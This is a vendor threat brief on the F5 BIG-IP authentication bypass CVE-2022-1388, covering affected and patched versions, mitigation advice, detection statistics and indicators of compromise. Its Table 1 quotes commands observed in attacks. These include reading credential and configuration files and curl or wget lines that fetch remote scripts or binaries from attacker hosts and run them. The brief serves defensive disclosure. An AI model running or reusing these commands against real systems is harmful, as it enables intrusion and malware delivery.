This post is also available in: 日本語 (Japanese)
Executive Summary
On May 4, 2022, F5 released a security advisory for a remote code execution vulnerability in the iControlREST component of its BIG-IP product tracked in CVE-2022-1388. Threat actors can exploit this vulnerability to bypass authentication and run arbitrary code on unpatched systems. This is a critical vulnerability that needs immediate attention, as it was given a 9.8 CVSS score. Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun.
Palo Alto Networks released a Threat Prevention signature for the F5 BIG-IP Authentication Bypass Vulnerability (92570) and within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts.
Unit 42 recommends customers upgrade to the latest release of F5 BIG-IP products. Palo Alto Networks Next Generation Firewall Threat Prevention customers are protected with Signature 92570.
CVEs discussed | CVE-2022-1388 |
Vulnerable Systems
The F5 product vulnerable to CVE-2022-1388 is BIG-IP with the following versions:
- 16.1.0 - 16.1.2
- 15.1.0 - 15.1.5
- 14.1.0 - 14.1.4
- 13.1.0 - 13.1.4
- 12.1.0 - 12.1.6
- 11.6.1 - 11.6.5
The vulnerability exists within the iControl REST framework used by BIG-IP.
Mitigation Actions
We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:
- 17.0.0
- 16.1.2.2
- 15.1.5.1
- 14.1.4.6
- 13.1.5
Until you can install the patched versions of BIG-IP, see the Mitigation section on the F5 security advisory for information on how to mitigate this vulnerability via a workaround to limit the vulnerable component to trusted networks.
Observed in the Wild
In response to the F5 security advisory, Palo Alto Networks released the Threat Prevention signature F5 BIG-IP Authentication Bypass Vulnerability (92570) on May 9.
We observed this signature triggered 2,552 times between 4:47 and 14:00 UTC on May 10. We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.
Table 1 shows the commands that would be executed in the event of successful exploitation. These were found by analysis of the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.
Count | Command |
1954 | id |
125 | cat /config/bigip.conf |
24 | cat /etc/profile |
19 | curl -o- -L hxxp://20.239.193[.]47/kele.sh| sh > /dev/null 2>&1 & |
13 | whoami |
11 | find /usr/local/www -name *.php | xargs grep eval |
3 | curl -fsLk hxxps://transfer[.]sh/dlxo3I/1.sh | sh |
1 | wget hxxp://20.187.86[.]47/dadda;chmod 777 *;./dadda |
1 | curl -o- -L hxxp://20.239.193[.]47/kele1|sh |
Table 1. Commands observed in CVE-2022-1388 exploitation attempts.
Conclusion
Palo Alto Networks customers receive protections against the exploitation of this vulnerability in the following ways:
- Next-Generation Firewalls with a Threat Prevention security subscription (running Applications and Threat content update version 8567) can automatically block sessions related to this vulnerability using the F5 BIG-IP Authentication Bypass Vulnerability signature (Threat ID 92570).
Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.
Additional Resources
K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
EnemyBot Attempts to Exploit CVE-2022-1388
Indicators of Compromise
Payload SHA256
30f7e1998d162dfad69d6d8abb763ae4033bbd4a015d170b1ad3e20d39cd4e20
da647646cd36a3acb716b4266e9032f9c1caf555b7667e1dbe5bef89e7d2fdbb
b39d2a1202351d3be5d9906ec47ee05c305302124dddec5538dc7b9924c6b85d
ad6d44c70f83431bedf890967f2da0607c9b1f79591fb1b2697160f5b1c1a75c
1f93a6696f7bf1b2067cc503583deb4840404ebeeba89579bd303f57000baeb7
9a72aab2a3d1d6e66c185966597a52a8726ca25f5d9e2195af44f98d8b1847d5
53214f4d2d2dfd02b46f416cbdcb6f3a764820a50da4d59926f829b96cf82a6c
Source IPv4
20.187.67[.]224
192.132.218[.]149
85.203.23[.]73
116.48.110[.]159
Hosting URLs
hxxps://transfer[.]sh/dlxo3I/1.sh
hxxp://20.239.193[.]47/kele.sh
hxxp://20.239.193[.]47/kele1
hxxp://20.187.86[.]47/dadda
Updated May 16, 2022